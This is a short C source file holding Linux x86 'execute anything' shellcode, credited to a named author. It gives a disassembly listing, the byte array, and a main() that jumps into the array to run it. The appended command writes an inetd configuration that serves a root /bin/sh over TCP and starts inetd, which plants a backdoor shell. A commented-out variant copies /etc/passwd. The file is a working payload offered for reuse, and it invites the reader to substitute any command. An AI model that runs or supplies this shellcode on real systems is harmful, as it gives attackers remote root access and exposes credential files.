//
// 'execute anything' linux shellcode
// coded by Sergio 'shadown' Alvarez
// shadown@gmail.com || shadown@g-con.org
//

/*
00000000  EB25              jmp short 0x27
00000002  5A                pop edx
00000003  31C9              xor ecx,ecx
00000005  51                push ecx
00000006  686E2F7368        push dword 0x68732f6e
0000000B  682F2F6269        push dword 0x69622f2f
00000010  89E3              mov ebx,esp
00000012  51                push ecx
00000013  66682D63          push word 0x632d
00000017  89E0              mov eax,esp
00000019  51                push ecx
0000001A  52                push edx
0000001B  50                push eax
0000001C  53                push ebx
0000001D  89E1              mov ecx,esp
0000001F  31D2              xor edx,edx
00000021  31C0              xor eax,eax
00000023  040B              add al,0xb
00000025  CD80              int 0x80
00000027  E8D6FFFFFF        call 0x2
*/

char sc[] = "\xeb\x25"
				"\x5a"
				"\x31\xc9"
				"\x51"
				"\x68\x6e\x2f\x73\x68"
				"\x68\x2f\x2f\x62\x69"
				"\x89\xe3"
				"\x51"
				"\x66\x68\x2d\x63"
				"\x89\xe0"
				"\x51"
				"\x52"
				"\x50"
				"\x53"
				"\x89\xe1"
				"\x31\xd2"
				"\x31\xc0"
				"\x04\x0b"
				"\xcd\x80"
				"\xe8\xd6\xff\xff\xff"
				//"/bin/cat /etc/passwd > /tmp/salida; /bin/cat /tmp/salida"; // replace this by anything that you wish to execute ;)
				"/bin/echo \"domain stream tcp nowait root /bin/sh sh -i\" > /tmp/myshell; /usr/sbin/inetd /tmp/myshell &";

int main(int argc, char *argv[])
	{
	void (*shell)() = (void (*)())sc;
	shell();
	return 0;
	}